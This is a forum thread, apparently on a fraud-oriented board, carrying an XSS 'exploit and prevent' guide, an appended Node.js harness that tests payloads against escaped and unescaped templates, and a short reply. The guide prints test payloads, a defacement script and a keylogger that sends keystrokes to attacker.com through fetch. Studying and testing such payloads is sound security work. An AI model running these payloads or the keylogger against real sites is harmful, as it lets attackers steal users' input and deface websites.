
💥 [GUIDE] Cross-Site Scripting (XSS) – How to Exploit & Prevent It [2025]



BlueBird (Moderator · Legend · Supreme · Joined 28.06.23 · Messages 790 · Reaction score 350 · Points 99)
Cross-Site Scripting (XSS) is one of the most common web vulnerabilities, affecting thousands of websites each year. If exploited, an attacker can steal user sessions, perform phishing attacks, or completely deface a website.

This guide will cover:
✔️ What XSS is and why it’s dangerous
✔️ The three main types of XSS attacks
✔️ How to detect and exploit XSS vulnerabilities
✔️ Best practices for securing web applications



🔍 What is Cross-Site Scripting (XSS)?

XSS occurs when a website improperly processes user input, allowing an attacker to inject and execute JavaScript in a victim’s browser.

Example of a vulnerable website:
<p>Welcome, <b><?php echo $_GET['name']; ?></b></p>
If a site does not sanitize input, an attacker can execute JavaScript using:
https://example.com/?name=<script>alert('XSS')</script>
If this results in a popup alert, the website is vulnerable.



🕵️ Types of XSS Attacks


✅ Stored XSS (Persistent XSS)
The malicious script is permanently stored in the website’s database and executed every time a user visits the affected page. Commonly found in comment sections, user profiles, and forums.

✅ Reflected XSS
The malicious script is included in a URL and executed when a victim clicks on a crafted link. This is often used in phishing attacks.

✅ DOM-Based XSS
The vulnerability exists entirely on the client side, manipulating the webpage’s Document Object Model (DOM) without interacting with the server.



💀 How to Find & Exploit XSS Vulnerabilities


Manual Testing for XSS:
Try injecting common payloads into input fields or URLs:
<script>alert('XSS')</script>
"><script>alert(1)</script>
'"><img src=x onerror=alert(1)>
If the input is reflected back without sanitization, the site may be vulnerable.

Using Burp Suite for XSS Detection:
1. Intercept traffic with Burp Suite.
2. Modify request parameters with XSS payloads.
3. Observe the responses for JavaScript execution.

Automating XSS Detection with XSStrike:
XSStrike automatically detects and exploits XSS vulnerabilities.



🔥 Advanced XSS Exploits


1. Session Hijacking via XSS
If cookies are not set with `HttpOnly`, an attacker can steal them:

2. Defacing a Website with XSS
<script>document.body.innerHTML = '<h1>Hacked</h1>';</script>

3. Keylogging via XSS
<script>
document.onkeypress = function(e) {
  fetch('https://attacker.com/logger.php?key=' + e.key);
};
</script>



🛡️ How to Prevent XSS Attacks


✅ 1. Input Validation & Sanitization
Escape special characters before rendering:
echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');

✅ 2. Use Content Security Policy (CSP)
A strong CSP blocks inline scripts:
Content-Security-Policy: default-src 'self'; script-src 'self'

✅ 3. Secure Cookies
Set `HttpOnly` and `Secure` flags to protect sessions:
Set-Cookie: session=xyz; HttpOnly; Secure



🔥 Conclusion

Cross-Site Scripting is one of the most exploited web vulnerabilities. Pentesters should know how to detect and exploit XSS, while developers must implement strict input validation and security measures.

What’s the most interesting XSS vulnerability you’ve encountered? Let’s discuss below!
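Added example (not code from BlueBird's post): a small Node.js harness that runs the guide's three manual-testing payloads against the vulnerable `name` template, against the same template hardened with an htmlspecialchars-equivalent escape, and against a constructed third template that drops the value into an unquoted HTML attribute, where entity escaping alone is not enough. It also parses a Set-Cookie header for the HttpOnly/Secure flags and checks whether a CSP still permits inline scripts. The fourth payload, the unquoted-attribute template, the cookie and CSP strings, and the `looksExploitable` grep are all assumptions made for this example.

```javascript
// Added example (not from the original post). Runs the guide's XSS payloads
// through a vulnerable template, an escaped template and an unquoted-attribute
// template, then checks cookie flags and CSP. All inputs are constructed.

// The guide's three payloads, plus a constructed fourth one that contains
// none of & < > " ' so HTML-entity escaping leaves it untouched.
const PAYLOADS = [
  "<script>alert('XSS')</script>",
  '"><script>alert(1)</script>',
  '\'"><img src=x onerror=alert(1)>',
  'x onmouseover=alert(1)',
];

// Vulnerable template: mirrors <b><?php echo $_GET['name']; ?></b> from the guide.
function renderVulnerable(name) {
  return `<p>Welcome, <b>${name}</b></p>`;
}

// JavaScript equivalent of PHP htmlspecialchars($s, ENT_QUOTES, 'UTF-8').
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened template: same markup, value escaped for an HTML text context.
function renderSafe(name) {
  return `<p>Welcome, <b>${escapeHtml(name)}</b></p>`;
}

// Hypothetical template (assumed for this example) that puts the value into an
// UNQUOTED attribute. Escaping is the wrong defence here: any payload containing
// whitespace starts a new attribute, so on* handlers get in without a single
// special character. The fix is to quote the attribute (class="...") AND escape.
function renderUnquotedAttr(name) {
  return `<div class=${escapeHtml(name)}>Welcome</div>`;
}

// Tester's check for the "reflected without sanitization" step: did the
// response gain a <script> tag, or a tag carrying an on* handler? This is a
// crude grep like a manual tester's; a browser is the real oracle.
const INJECTED_SCRIPT = /<script\b|<[a-z][^>]*\son[a-z]+\s*=/i;
function looksExploitable(html) {
  return INJECTED_SCRIPT.test(html);
}

// Run every payload through a template and report which ones land.
function runPayloads(render) {
  return PAYLOADS.map((p) => ({ payload: p, vulnerable: looksExploitable(render(p)) }));
}

// Parse a Set-Cookie header and report the two flags the guide recommends.
function cookieFlags(setCookie) {
  const attrs = setCookie.split(';').slice(1).map((a) => a.trim().toLowerCase());
  return { httpOnly: attrs.includes('httponly'), secure: attrs.includes('secure') };
}

// Does this CSP still allow inline <script> blocks (i.e. inline XSS payloads)?
// No script-src and no default-src means no restriction at all. 'unsafe-inline'
// is ignored by CSP2+ browsers once a nonce- or hash-source is in the directive.
function cspAllowsInlineScript(csp) {
  const directives = {};
  for (const d of csp.split(';')) {
    const [name, ...values] = d.trim().split(/\s+/);
    if (name) directives[name.toLowerCase()] = values;
  }
  const src = directives['script-src'] ?? directives['default-src'];
  if (!src) return true;
  const hasNonceOrHash = src.some((v) => /^'(nonce-|sha(256|384|512)-)/i.test(v));
  return src.includes("'unsafe-inline'") && !hasNonceOrHash;
}

// Stand-alone demo (node xss_demo.js).
if (typeof require !== 'undefined' && require.main === module) {
  const templates = [['vulnerable', renderVulnerable], ['escaped', renderSafe],
    ['unquoted attr', renderUnquotedAttr]];
  for (const [label, render] of templates) {
    console.log(label, runPayloads(render).map((r) => r.vulnerable));
  }
  console.log(cookieFlags('session=xyz; HttpOnly; Secure'));
  console.log(cspAllowsInlineScript("default-src 'self'; script-src 'self'"));
}
```

Against the vulnerable template the three guide payloads land and the fourth does not (in text context it is just text); against the escaped template none land; against the unquoted-attribute template the two payloads that contain whitespace land, which is why output encoding has to match the context the value is written into, and why quoted attributes plus CSP are listed alongside escaping rather than instead of it.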
 

Lincoln (Senior Fraud Engineer · Elite · Premium · Joined 13.07.22 · Messages 445 · Reaction score 11,628 · Points 93)
XSS is definitely the best, but I started with sqlmap a very long time ago to build confidence. I still prefer XSS for the wider range of payload options.
 